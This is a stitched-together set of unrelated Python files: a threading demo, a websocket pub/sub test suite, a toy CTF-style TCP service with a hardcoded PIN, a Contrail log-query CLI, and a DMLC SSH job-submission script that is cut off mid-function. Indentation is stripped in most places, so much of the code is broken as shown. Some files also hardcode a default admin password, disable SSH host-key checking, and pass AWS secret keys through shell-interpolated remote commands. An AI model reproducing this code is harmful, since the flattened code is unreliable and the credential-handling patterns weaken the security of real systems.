#! /usr/bin/env python3
# -*- coding:utf-8 -*-
import threading
import time
# Use an Event to coordinate two or more threads. The example below models a
# traffic light: one thread acts as the light, while several "car" threads
# drive on green and stop and wait on red.
def lighter():
count = 0
event.set()
while True:
if 5 < count < 10:
event.clear()
print("This is RED....")
elif count > 10:
event.set()
count = 0
else:
print("This is GREEN...")
time.sleep(1)
count += 1
def car(name):
while True:
if event.is_set():
print(" Green, The %s running...." % name)
time.sleep(1)
else:
print("RED, the %s is waiting..." % name)
event.wait()
print("green, %s start going..." % name)
event = threading.Event()
light = threading.Thread(target=lighter, )
light.start()
car1 = threading.Thread(target=car, args=("Tesla",))
car1.start()
|
server_with_remote_id_test.py
|
import os
import sys
import pytest
import uvicorn
import asyncio
import requests
from fastapi import FastAPI
from multiprocessing import Process
from fastapi_websocket_rpc.utils import gen_uid
from fastapi_websocket_rpc.logger import get_logger
from fastapi_websocket_rpc.rpc_channel import RpcChannel
# Add parent path to use local src as package for tests
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
)
from fastapi_websocket_pubsub import PubSubEndpoint, PubSubClient
from fastapi_websocket_pubsub.event_notifier import ALL_TOPICS
logger = get_logger("Test")
# Configurable
PORT = int(os.environ.get("PORT") or "7990")
uri = f"ws://localhost:{PORT}/pubsub"
trigger_url = f"http://localhost:{PORT}/trigger"
ask_remote_id_url = f"http://localhost:{PORT}/ask-remote-id"
DATA = "MAGIC"
EVENT_TOPIC = "event/has-happened"
REMOTE_ID_ANSWER_TOPIC = "client/my-remote-id"
def setup_server_rest_routes(
app, endpoint: PubSubEndpoint, remote_id_event: asyncio.Event
):
@app.get("/trigger")
async def trigger_events():
logger.info("Triggered via HTTP route - publishing event")
        # Publish an event on EVENT_TOPIC
        # Since we are calling back (RPC) to the client - this would deadlock if we waited on it
asyncio.create_task(endpoint.publish([EVENT_TOPIC], data=DATA))
return "triggered"
    @app.get("/ask-remote-id")
    async def ask_remote_id():
        logger.info("Got asked if I have the remote id")
answer = "yes" if remote_id_event.is_set() else "no"
asyncio.create_task(
endpoint.publish([REMOTE_ID_ANSWER_TOPIC], {"answer": answer})
)
return {"answer": answer}
def setup_server():
app = FastAPI()
remote_id_ok = asyncio.Event()
async def try_to_get_remote_id(channel: RpcChannel):
logger.info(f"trying to get remote channel id")
channel_other_channel_id = await channel.get_other_channel_id()
logger.info(f"finished getting remote channel id")
if channel_other_channel_id is not None:
remote_id_ok.set()
logger.info(f"remote channel id: {channel_other_channel_id}")
            logger.info(f"local channel id: {channel.id}")
async def on_connect(channel: RpcChannel):
logger.info(f"Connected to remote channel")
asyncio.create_task(try_to_get_remote_id(channel))
# PubSub websocket endpoint - setting up the server with remote id
endpoint = PubSubEndpoint(rpc_channel_get_remote_id=True, on_connect=[on_connect])
endpoint.register_route(app, path="/pubsub")
# Regular REST endpoint - that publishes to PubSub
setup_server_rest_routes(app, endpoint, remote_id_ok)
uvicorn.run(app, port=PORT)
@pytest.fixture()
def server():
# Run the server as a separate process
proc = Process(target=setup_server, args=(), daemon=True)
proc.start()
yield proc
proc.kill() # Cleanup after test
@pytest.mark.asyncio
async def test_subscribe_http_trigger_with_remote_id_on(server):
"""
same as the basic_test::test_subscribe_http_trigger, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
        # start listening
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# trigger the server via an HTTP route
requests.get(trigger_url)
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_pub_sub_with_remote_id_on(server):
"""
same as the basic_test::test_pubsub, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
        # start listening
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
        # publish events (with sync=False to avoid deadlocks waiting on the publish to ourselves)
published = await client.publish(
[EVENT_TOPIC], data=DATA, sync=False, notifier_id=gen_uid()
)
assert published.result
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_pub_sub_with_all_topics_with_remote_id_on(server):
"""
same as the basic_test::test_pub_sub_with_all_topics, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(ALL_TOPICS, on_event)
        # start listening
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
        # publish events (with sync=False to avoid deadlocks waiting on the publish to ourselves)
published = await client.publish(
[EVENT_TOPIC], data=DATA, sync=False, notifier_id=gen_uid()
)
assert published.result
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_getting_remote_id(server):
"""
tests that the server managed to get the client's channel id successfully.
"""
# finish trigger
finish = asyncio.Event()
remote_id_yes = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
async def on_answer(data, topic):
assert data.get("answer", None) == "yes"
remote_id_yes.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
client.subscribe(REMOTE_ID_ANSWER_TOPIC, on_answer)
        # start listening
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# trigger the server via an HTTP route
requests.get(trigger_url)
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
# sleep so that the server can finish getting the remote id
await asyncio.sleep(1)
# ask the server if he got the remote id
# will trigger the REMOTE_ID_ANSWER_TOPIC topic and the on_answer() callback
requests.get(ask_remote_id_url)
await asyncio.wait_for(remote_id_yes.wait(), 5)
        # the client can also try to get its remote id
        # super ugly, but it works:
my_remote_id = await client._rpc_channel._get_other_channel_id()
assert my_remote_id is not None
|
whitney.py
|
#!/usr/bin/env python
# authored by John Hammond
# edited by babysnoop
import SocketServer
import time
import threading
class Service(SocketServer.BaseRequestHandler):
def handle( self ):
print "someone connected!"
entered = self.receive()
entered_a = entered.split(" ")
pin = "77"
if ( entered_a[0].lower() == "iseo" ):
if ( len(entered_a) == 1 ):
self.send( "please supply a command" )
elif ( entered_a[1].lower() == "location" ):
if ( len(entered_a) < 3):
self.send( "please provide the two digit security pin for this information" )
elif ( entered_a[2] != pin ):
self.send( "incorrect two digit security pin" )
else:
self.send( "25N77W" )
elif ( entered_a[1].lower() == "fuel-level" ):
self.send( "33%" )
elif ( entered_a[1].lower() == "hull-condition" ):
self.send( "good" )
else:
self.send( "please choose one of the available commands" )
else:
            self.send( "vessel not found\nUsage\n[vessel name] [command] [two digit security pin]\navailable commands: location, fuel-level, hull-condition" )
def send( self, string, newline = True ):
if newline: string = string + "\n"
self.request.sendall(string)
    def receive( self, prompt = " > " ):
        self.send( prompt, newline = False )
return self.request.recv( 4096 ).strip()
class ThreadedService( SocketServer.ThreadingMixIn, SocketServer.TCPServer, SocketServer.DatagramRequestHandler ):
pass
def main():
port = 1337
host = '0.0.0.0'
service = Service
server = ThreadedService( ( host, port ), service )
server.allow_reuse_address = True
server_thread = threading.Thread( target = server.serve_forever )
server_thread.daemon = True
server_thread.start()
print "Server started on port", port
while ( True ): time.sleep(60)
if ( __name__ == "__main__" ):
main()
|
log.py
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# log
#
# Query log messages from analytics
#
import sys
import ConfigParser
import argparse
import json
import datetime
import logging
import logging.handlers
import time
import re
from multiprocessing import Process
from opserver_util import OpServerUtils
from sandesh_common.vns.ttypes import Module
from sandesh_common.vns.constants import ModuleNames, NodeTypeNames
import sandesh.viz.constants as VizConstants
from pysandesh.gen_py.sandesh.ttypes import SandeshType, SandeshLevel
from pysandesh.sandesh_logger import SandeshLogger
from pysandesh.util import UTCTimestampUsec
import commands
import ast
OBJECT_TYPE_LIST = [table_info.log_query_name for table_info in \
VizConstants._OBJECT_TABLES.values()]
OBJECT_TABLE_MAP = dict((table_info.log_query_name, table_name) for \
(table_name, table_info) in VizConstants._OBJECT_TABLES.items())
output_file_handle = None
class LogQuerier(object):
def __init__(self):
self._args = None
self._slogger = None
# end __init__
def run(self):
try:
if self.parse_args() != 0:
return
if self._args.tail:
start_time = UTCTimestampUsec() - 10*pow(10,6)
while True:
self._start_time = start_time
self._end_time = UTCTimestampUsec()
start_time = self._end_time + 1
time.sleep(3)
result = self.query()
if result == -1:
return
self.display(result)
else:
start_time = self._args.start_time
end_time = self._args.end_time
if not self._args.start_time:
start_time = "now-10m"
if not self._args.end_time:
end_time = "now"
try:
self._start_time, self._end_time = \
OpServerUtils.parse_start_end_time(
start_time = start_time,
end_time = end_time,
last = self._args.last)
except:
return -1
start_time = self._start_time
end_time = self._end_time
result_list = []
while int(end_time) - int(start_time) > 0:
if not self._args.reverse:
self._start_time = start_time
self._end_time = start_time + 10*60*pow(10,6) if (start_time + 10*60*pow(10,6) <= int(end_time)) else int(end_time)
else:
self._end_time = end_time
self._start_time = end_time - 10*60*pow(10,6) if (end_time - 10*60*pow(10,6) >= int(start_time)) else int(start_time)
p = Process(target=self.display, args=(result_list,))
p.start()
result = self.query()
if result == -1:
return
# Accumulate the result before processing it as the
# formatting of result can be cpu intensive and hence would
# affect the overall time taken to fetch the result from the
# analytics-api. Since the query result ttl is set to 5 min
# in redis, it is necessary to improve the read throughput.
result_list = self.read_result(result)
p.join()
if not self._args.reverse:
start_time = self._end_time + 1
else:
end_time = self._start_time - 1
self.display(result_list)
except KeyboardInterrupt:
return
# Public functions
def parse_args(self):
"""
Eg. python log.py --analytics-api-ip 127.0.0.1
--analytics-api-port 8181
--source 127.0.0.1
--node-type Control
--module bgp | cfgm | vnswad
--instance-id 0
--message-type UveVirtualMachineConfigTrace
--category xmpp
--level SYS_INFO | SYS_ERROR
--object-type virtual-network | virtual-machine
--object-id name
--object-select-field ObjectLog | SystemLog
--reverse
--verbose
--raw
--trace BgpPeerTraceBuf
[--start-time now-10m --end-time now] | --last 10m
--send-syslog
--syslog-server 127.0.0.1
--syslog-port 514
                          --keywords comma,separated,list
"""
defaults = {
'analytics_api_ip': '127.0.0.1',
'analytics_api_port': '8181',
'admin_user': 'admin',
'admin_password': 'contrail123',
'conf_file': '/etc/contrail/contrail-keystone-auth.conf',
}
conf_parser = argparse.ArgumentParser(add_help=False)
conf_parser.add_argument("--admin-user", help="Name of admin user")
conf_parser.add_argument("--admin-password", help="Password of admin user")
conf_parser.add_argument("--conf-file", help="Configuration file")
conf_parser.add_argument("--analytics-api-ip", help="IP address of Analytics API Server")
conf_parser.add_argument("--analytics-api-port", help="Port of Analytics API Server")
args, remaining_argv = conf_parser.parse_known_args();
configfile = defaults['conf_file']
if args.conf_file:
configfile = args.conf_file
config = ConfigParser.SafeConfigParser()
config.read(configfile)
if 'KEYSTONE' in config.sections():
if args.admin_user == None:
args.admin_user = config.get('KEYSTONE', 'admin_user')
if args.admin_password == None:
args.admin_password = config.get('KEYSTONE','admin_password')
if args.admin_user == None:
args.admin_user = defaults['admin_user']
if args.admin_password == None:
args.admin_password = defaults['admin_password']
if args.analytics_api_ip == None:
args.analytics_api_ip = defaults['analytics_api_ip']
if args.analytics_api_port == None:
args.analytics_api_port = defaults['analytics_api_port']
tab_url = "http://" + args.analytics_api_ip + ":" +\
args.analytics_api_port + "/analytics/tables"
tables = OpServerUtils.get_url_http(tab_url,
args.admin_user, args.admin_password)
if tables != {}:
if tables.status_code == 200:
table_list = json.loads(tables.text)
for table in table_list:
if table['type'] == 'OBJECT':
# append to OBJECT_TYPE_LIST only if not existing
if table['name'] not in OBJECT_TABLE_MAP.values():
OBJECT_TYPE_LIST.append(str(table['name']))
# For object table the mapping between the actual table
# name and the table name used in help msg are the same
OBJECT_TABLE_MAP[table['name']]=table['name']
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser],
# print script description with -h/--help
description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.set_defaults(**defaults)
parser.add_argument(
"--start-time", help="Logs start time (format now-10m, now-1h)")
parser.add_argument("--end-time", help="Logs end time")
parser.add_argument(
"--last", help="Logs from last time period (format 10m, 1d)")
parser.add_argument("--source", help="Logs from source address")
parser.add_argument("--node-type", help="Logs from node type",
choices=NodeTypeNames.values())
parser.add_argument(
"--module", help="Logs from module", choices=ModuleNames.values())
parser.add_argument("--instance-id", help="Logs from module instance")
parser.add_argument("--category", help="Logs of category")
parser.add_argument("--level", help="Logs of level")
parser.add_argument("--message-type", help="Logs of message type")
parser.add_argument("--reverse", action="store_true",
help="Show logs in reverse chronological order")
parser.add_argument(
"--verbose", action="store_true", help="Show internal information")
parser.add_argument(
"--raw", action="store_true", help="Show raw XML messages")
parser.add_argument(
"--object-type", help="Logs of object type", choices=OBJECT_TYPE_LIST)
parser.add_argument("--object-values", action="store_true",
help="Display list of object names")
parser.add_argument("--object-id", help="Logs of object name")
parser.add_argument(
"--object-select-field", help="Select field to filter the log",
choices=[VizConstants.OBJECT_LOG, VizConstants.SYSTEM_LOG])
parser.add_argument("--trace", help="Dump trace buffer")
parser.add_argument("--limit", help="Limit the number of messages")
parser.add_argument("--send-syslog", action="store_true",
help="Send syslog to specified server and port")
parser.add_argument("--syslog-server",
help="IP address of syslog server", default='localhost')
parser.add_argument("--syslog-port", help="Port to send syslog to",
type=int, default=514)
parser.add_argument("--tail","-f", help="Tail logs from now", action="store_true")
        parser.add_argument("--keywords", help="comma separated list of keywords")
parser.add_argument("--message-types", \
help="Display list of message type", action="store_true")
parser.add_argument("--output-file", "-o", help="redirect output to file")
parser.add_argument("--json", help="Dump output as json", action="store_true")
parser.add_argument("--all", action="store_true", help=argparse.SUPPRESS)
self._args = parser.parse_args(remaining_argv)
self._args.admin_user = args.admin_user
self._args.admin_password = args.admin_password
self._args.analytics_api_ip = args.analytics_api_ip
self._args.analytics_api_port = args.analytics_api_port
return 0
# end parse_args
# Public functions
def query(self):
if self._args.tail and (self._args.send_syslog or self._args.reverse or
self._args.start_time or self._args.end_time):
invalid_combination = " --tail"
if self._args.send_syslog:
invalid_combination += ", --send-syslog"
if self._args.reverse:
invalid_combination += ", --reverse"
if self._args.start_time:
invalid_combination += ", --start-time"
if self._args.end_time:
invalid_combination += ", --end-time"
print "Combination of options" + invalid_combination + " are not valid."
return -1
global output_file_handle
if self._args.output_file is not None:
if output_file_handle is None:
#Open the file for writing
try:
if self._args.tail:
output_file_handle = open(self._args.output_file, "a")
else:
output_file_handle = open(self._args.output_file, "w")
except Exception as e:
print e
                    print "Exception occurred when creating/opening file %s" % \
self._args.output_file
return -1
start_time, end_time = self._start_time, self._end_time
if self._args.message_types is True:
command_str = ("contrail-stats --table FieldNames.fields" +
" --where name=MessageTable:Messagetype --select name fields.value" +
" --start-time " + str(start_time) +
" --end-time " + str(end_time) +
" --analytics-api-ip " + str(self._args.analytics_api_ip) +
" --analytics-api-port " + str(self._args.analytics_api_port))
res = commands.getoutput(command_str)
res = res.splitlines()
res = res[1:]
for r in res:
print ast.literal_eval(r)['fields.value']
return None
messages_url = OpServerUtils.opserver_query_url(
self._args.analytics_api_ip,
self._args.analytics_api_port)
where_msg = []
where_obj = []
and_filter = []
or_filter = []
if self._args.source is not None:
if self._args.source.endswith('*'):
val = self._args.source[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.source
oper = OpServerUtils.MatchOp.EQUAL
source_match = OpServerUtils.Match(name=VizConstants.SOURCE,
value=val, op=oper)
where_msg.append(source_match.__dict__)
if self._args.module is not None:
module_match = OpServerUtils.Match(name=VizConstants.MODULE,
value=self._args.module,
op=OpServerUtils.MatchOp.EQUAL)
where_msg.append(module_match.__dict__)
if self._args.category is not None:
if self._args.category.endswith('*'):
val = self._args.category[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.category
oper = OpServerUtils.MatchOp.EQUAL
category_match = OpServerUtils.Match(
name=VizConstants.CATEGORY,
value=val, op=oper)
where_msg.append(category_match.__dict__)
if self._args.message_type is not None:
if self._args.message_type.endswith('*'):
val = self._args.message_type[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.message_type
oper = OpServerUtils.MatchOp.EQUAL
message_type_match = OpServerUtils.Match(
name=VizConstants.MESSAGE_TYPE,
value=val, op=oper)
where_msg.append(message_type_match.__dict__)
if self._args.level is not None:
level_match = OpServerUtils.Match(
name=VizConstants.LEVEL,
value=SandeshLevel._NAMES_TO_VALUES[self._args.level],
op=OpServerUtils.MatchOp.LEQ)
and_filter.append(level_match.__dict__)
if self._args.node_type is not None:
node_type_match = OpServerUtils.Match(
name=VizConstants.NODE_TYPE,
value=self._args.node_type,
op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(node_type_match.__dict__)
if self._args.instance_id is not None:
instance_id_match = OpServerUtils.Match(
name=VizConstants.INSTANCE_ID,
value=self._args.instance_id,
op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(instance_id_match.__dict__)
# Object logs :
# --object-type <> : All logs for the particular object type
# --object-type <> --object-values : Object-id values for the particular
        #                                    object type
# --object-type <> --object-id <> : All logs matching object-id for
# particular object type
if (self._args.object_type is not None or
self._args.object_id is not None or
self._args.object_select_field is not None or
self._args.object_values is True):
# Validate object-type
if self._args.object_type is not None:
if self._args.object_type in OBJECT_TYPE_LIST:
if self._args.object_type in OBJECT_TABLE_MAP:
table = OBJECT_TABLE_MAP[self._args.object_type]
else:
print 'Table not found for object-type [%s]' % \
(self._args.object_type)
return -1
else:
print 'Unknown object-type [%s]' % (self._args.object_type)
return -1
else:
print 'Object-type required for query'
return -1
# Validate object-id and object-values
if self._args.object_id is not None and \
self._args.object_values is False:
object_id = self._args.object_id
if object_id.endswith("*"):
id_match = OpServerUtils.Match(
name=OpServerUtils.OBJECT_ID,
value=object_id[:-1],
op=OpServerUtils.MatchOp.PREFIX)
else:
id_match = OpServerUtils.Match(
name=OpServerUtils.OBJECT_ID,
value=object_id,
op=OpServerUtils.MatchOp.EQUAL)
where_obj.append(id_match.__dict__)
elif self._args.object_id is not None and \
self._args.object_values is True:
print 'Please specify either object-id or object-values but not both'
return -1
if self._args.object_values is False:
if self._args.object_select_field is not None:
obj_sel_field = self._args.object_select_field
if not isinstance(self._args.object_select_field, list):
obj_sel_field = [self._args.object_select_field]
                    if all(field in (VizConstants.OBJECT_LOG,
                                     VizConstants.SYSTEM_LOG)
                           for field in obj_sel_field):
self._args.object_select_field = obj_sel_field
else:
print 'Invalid object-select-field. '\
'Valid values are "%s" or "%s"' \
% (VizConstants.OBJECT_LOG,
VizConstants.SYSTEM_LOG)
return -1
else:
self._args.object_select_field = obj_sel_field = [
VizConstants.OBJECT_LOG, VizConstants.SYSTEM_LOG]
select_list = [
VizConstants.TIMESTAMP,
VizConstants.SOURCE,
VizConstants.MODULE,
VizConstants.MESSAGE_TYPE,
] + obj_sel_field
else:
if self._args.object_select_field:
print 'Please specify either object-id with ' + \
'object-select-field or only object-values'
return -1
if len(where_msg):
options = [where['name'] for where in where_msg]
print 'Invalid/unsupported where-clause options %s for object-values query' % str(options)
return -1
select_list = [
OpServerUtils.OBJECT_ID
]
if len(where_obj) or len(where_msg):
where = [where_obj + where_msg]
else:
where = None
elif self._args.trace is not None:
table = VizConstants.COLLECTOR_GLOBAL_TABLE
if self._args.source is None:
print 'Source is required for trace buffer dump'
return -1
if self._args.module is None:
print 'Module is required for trace buffer dump'
return -1
trace_buf_match = OpServerUtils.Match(
name=VizConstants.CATEGORY,
value=self._args.trace,
op=OpServerUtils.MatchOp.EQUAL)
where_msg.append(trace_buf_match.__dict__)
where = [where_msg]
select_list = [
VizConstants.TIMESTAMP,
VizConstants.MESSAGE_TYPE,
VizConstants.SEQUENCE_NUM,
VizConstants.DATA,
VizConstants.SANDESH_TYPE
]
            sandesh_type_filter = OpServerUtils.Match(
                name=VizConstants.SANDESH_TYPE,
                value=str(SandeshType.TRACE),
                op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(sandesh_type_filter.__dict__)
else:
# Message Table Query
table = VizConstants.COLLECTOR_GLOBAL_TABLE
if len(where_msg):
where = [where_msg]
else:
where = None
select_list = [
VizConstants.TIMESTAMP,
VizConstants.SOURCE,
VizConstants.MODULE,
VizConstants.CATEGORY,
VizConstants.MESSAGE_TYPE,
VizConstants.SEQUENCE_NUM,
VizConstants.DATA,
VizConstants.SANDESH_TYPE,
VizConstants.LEVEL,
VizConstants.NODE_TYPE,
VizConstants.INSTANCE_ID,
]
filter = None
if len(or_filter):
filter = [and_filter+[filt] for filt in or_filter]
elif len(and_filter):
filter = [and_filter]
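        # Illustrative example: a --keywords value of "vrouter, xmpp  error"
        # (made up here) is split on commas/whitespace below and adds three
        # KEYWORD EQUAL matches ('vrouter', 'xmpp', 'error') to every where
        # clause.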
if self._args.keywords is not None:
            p = re.compile(r'\s*,\s*|\s+')
if where is None:
where = [[]]
for kwd in p.split(self._args.keywords):
message_type_match = OpServerUtils.Match(
name=VizConstants.KEYWORD,
value=kwd,
op=OpServerUtils.MatchOp.EQUAL)
for wc in where:
wc.append(message_type_match.__dict__)
# Add sort by timestamp for non object value queries
sort_op = None
sort_fields = None
if self._args.object_values is False:
if self._args.reverse:
sort_op = OpServerUtils.SortOp.DESCENDING
else:
sort_op = OpServerUtils.SortOp.ASCENDING
sort_fields = [VizConstants.TIMESTAMP]
if self._args.limit:
limit = int(self._args.limit)
else:
limit = None
messages_query = OpServerUtils.Query(table,
start_time=start_time,
end_time=end_time,
select_fields=select_list,
where=where,
filter=filter,
sort=sort_op,
sort_fields=sort_fields,
limit=limit)
if self._args.verbose:
print 'Performing query: {0}'.format(
json.dumps(messages_query.__dict__))
resp = OpServerUtils.post_url_http(
messages_url, json.dumps(messages_query.__dict__),
self._args.admin_user, self._args.admin_password)
result = {}
if resp is not None:
resp = json.loads(resp)
qid = resp['href'].rsplit('/', 1)[1]
result = OpServerUtils.get_query_result(
self._args.analytics_api_ip, self._args.analytics_api_port, qid,
self._args.admin_user, self._args.admin_password)
return result
# end query
def output(self, log_str, sandesh_level):
if self._args.json:
            if isinstance(log_str, dict):
                # convert to json and dump
                log_str = json.dumps(log_str)
        if self._args.output_file is not None:
            # Append to the specified output file
            try:
                with open(self._args.output_file, "a") as output_file_handle:
                    output_file_handle.write(log_str)
                    output_file_handle.write("\n")
                return
            except Exception as e:
                print e
                print "Exception occurred when writing file %s" % \
                    self._args.output_file
                return -1
if self._args.send_syslog:
syslog_level = SandeshLogger._SANDESH_LEVEL_TO_LOGGER_LEVEL[
sandesh_level]
self._logger.log(syslog_level, log_str)
else:
print log_str
#end output
def read_result(self, result_gen):
if not result_gen:
return
result_list = []
for r in result_gen:
result_list.append(r)
return result_list
# end read_result
def display(self, result):
if result == [] or result is None:
return
messages_dict_list = result
# Setup logger and syslog handler
if self._args.send_syslog:
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
syslog_handler = logging.handlers.SysLogHandler(
address = (self._args.syslog_server, self._args.syslog_port))
contrail_formatter = logging.Formatter('contrail: %(message)s')
syslog_handler.setFormatter(contrail_formatter)
logger.addHandler(syslog_handler)
self._logger = logger
# For json we will be outputting list of dicts so open the list here
if self._args.json:
first = True
self.output('[', SandeshLevel.INVALID)
for messages_dict in messages_dict_list:
if VizConstants.TIMESTAMP in messages_dict:
message_dt = datetime.datetime.fromtimestamp(
int(messages_dict[VizConstants.TIMESTAMP]) /
OpServerUtils.USECS_IN_SEC)
message_dt += datetime.timedelta(
microseconds=
(int(messages_dict[VizConstants.TIMESTAMP]) %
OpServerUtils.USECS_IN_SEC))
message_ts = message_dt.strftime(OpServerUtils.TIME_FORMAT_STR)
else:
message_ts = 'Time: NA'
messages_dict[VizConstants.TIMESTAMP] = message_ts
if VizConstants.SOURCE in messages_dict:
source = messages_dict[VizConstants.SOURCE]
else:
source = 'Source: NA'
if VizConstants.NODE_TYPE in messages_dict:
node_type = messages_dict[VizConstants.NODE_TYPE]
else:
node_type = ''
if VizConstants.MODULE in messages_dict:
module = messages_dict[VizConstants.MODULE]
else:
module = 'Module: NA'
if VizConstants.INSTANCE_ID in messages_dict:
instance_id = messages_dict[VizConstants.INSTANCE_ID]
else:
instance_id = ''
if VizConstants.MESSAGE_TYPE in messages_dict:
message_type = messages_dict[VizConstants.MESSAGE_TYPE]
else:
message_type = 'Message Type: NA'
if VizConstants.SANDESH_TYPE in messages_dict:
sandesh_type = messages_dict[VizConstants.SANDESH_TYPE]
else:
sandesh_type = SandeshType.INVALID
# By default SYS_DEBUG
sandesh_level = SandeshLevel.SYS_DEBUG
if self._args.object_type is None:
if VizConstants.CATEGORY in messages_dict:
category = messages_dict[VizConstants.CATEGORY]
else:
category = 'Category: NA'
if VizConstants.LEVEL in messages_dict:
sandesh_level = messages_dict[VizConstants.LEVEL]
level = SandeshLevel._VALUES_TO_NAMES[sandesh_level]
else:
level = 'Level: NA'
messages_dict[VizConstants.LEVEL] = level
if VizConstants.SEQUENCE_NUM in messages_dict:
seq_num = messages_dict[VizConstants.SEQUENCE_NUM]
else:
seq_num = 'Sequence Number: NA'
if VizConstants.DATA in messages_dict:
# Convert XML data to dict
if self._args.raw:
data_str = messages_dict[VizConstants.DATA]
else:
OpServerUtils.messages_xml_data_to_dict(
messages_dict, VizConstants.DATA)
if isinstance(messages_dict[VizConstants.DATA], dict):
data_dict = messages_dict[VizConstants.DATA]
data_str = OpServerUtils.messages_data_dict_to_str(
data_dict, message_type, sandesh_type)
else:
data_str = messages_dict[VizConstants.DATA]
else:
data_str = 'Data not present'
if self._args.json:
if not first:
self.output(", ", sandesh_level)
else:
first = False
OpServerUtils.messages_dict_scrub(messages_dict)
self.output(messages_dict, sandesh_level)
else:
if self._args.trace is not None:
trace_str = '{0} {1}:{2} {3}'.format(
message_ts, message_type, seq_num, data_str)
self.output(trace_str, sandesh_level)
else:
log_str = \
'{0} {1} [{2}:{3}:{4}:{5}][{6}] : {7}:{8} {9}'.format(
message_ts, source, node_type, module, instance_id,
category, level, message_type, seq_num, data_str)
self.output(log_str, sandesh_level)
else:
if self._args.object_values is True:
if OpServerUtils.OBJECT_ID in messages_dict:
obj_str = messages_dict[OpServerUtils.OBJECT_ID]
print obj_str
continue
for obj_sel_field in self._args.object_select_field:
if obj_sel_field in messages_dict:
if self._args.raw:
data_str = messages_dict[obj_sel_field]
else:
# Convert XML data to dict
OpServerUtils.messages_xml_data_to_dict(
messages_dict, obj_sel_field)
if isinstance(messages_dict[obj_sel_field], dict):
data_dict = messages_dict[obj_sel_field]
data_str =\
OpServerUtils.messages_data_dict_to_str(
data_dict, message_type,
sandesh_type)
else:
data_str = messages_dict[obj_sel_field]
if data_str:
obj_str = '{0} {1} [{2}:{3}:{4}] : {5}: {6}'.format(
message_ts, source, node_type, module,
instance_id, message_type, data_str)
if self._args.json:
if not first:
self.output(", ", sandesh_level)
else:
first = False
OpServerUtils.messages_dict_scrub(messages_dict)
self.output(messages_dict, sandesh_level)
else:
self.output(obj_str, sandesh_level)
# For json we will be outputting list of dicts so close the list here
if self._args.json:
self.output(']', SandeshLevel.INVALID)
# end display
# end class LogQuerier
def main():
querier = LogQuerier()
querier.run()
# end main
if __name__ == "__main__":
main()
|
ssh.py
|
#!/usr/bin/env python3
"""
DMLC submission script by ssh
One needs to make sure all slave machines are SSH-able.
"""
from __future__ import absolute_import
from multiprocessing import Pool, Process
import os, subprocess, logging
from threading import Thread
from . import tracker
def sync_dir(local_dir, slave_node, slave_dir):
"""
    Sync the working directory from the root node to a slave node.
"""
remote = slave_node[0] + ':' + slave_dir
logging.info('rsync %s -> %s', local_dir, remote)
prog = 'rsync -az --rsh="ssh -o StrictHostKeyChecking=no -p %s" %s %s' % (
slave_node[1], local_dir, remote)
subprocess.check_call([prog], shell = True)
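# For example (values are illustrative), sync_dir('/work/', ('10.0.0.2', '22'),
# '/tmp/work') runs:
#   rsync -az --rsh="ssh -o StrictHostKeyChecking=no -p 22" /work/ 10.0.0.2:/tmp/work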
def get_env(pass_envs):
envs = []
# get system envs
keys = ['OMP_NUM_THREADS', 'KMP_AFFINITY', 'LD_LIBRARY_PATH', 'AWS_ACCESS_KEY_ID',
'AWS_SECRET_ACCESS_KEY', 'DMLC_INTERFACE']
for k in keys:
v = os.getenv(k)
if v is not None:
envs.append('export ' + k + '=' + v + ';')
    # get pass_envs
for k, v in pass_envs.items():
envs.append('export ' + str(k) + '=' + str(v) + ';')
return (' '.join(envs))
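# For example (illustrative), with OMP_NUM_THREADS=4 set in the local
# environment, get_env({'DMLC_ROLE': 'worker'}) returns
# 'export OMP_NUM_THREADS=4; export DMLC_ROLE=worker;'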
def submit(args):
assert args.host_file is not None
with open(args.host_file) as f:
tmp = f.readlines()
assert len(tmp) > 0
hosts=[]
for h in tmp:
if len(h.strip()) > 0:
# parse addresses of the form ip:port
h = h.strip()
i = h.find(":")
p = "22"
if i != -1:
p = h[i+1:]
h = h[:i]
# hosts now contain the pair ip, port
hosts.append((h, p))
def ssh_submit(nworker, nserver, pass_envs):
"""
customized submit script
"""
# thread func to run the job
def run(prog):
subprocess.check_call(prog, shell = True)
# sync programs if necessary
local_dir = os.getcwd()+'/'
working_dir = local_dir
if args.sync_dst_dir is not None and args.sync_dst_dir != 'None':
working_dir = args.sync_dst_dir
pool = Pool(processes=len(hosts))
for h in hosts:
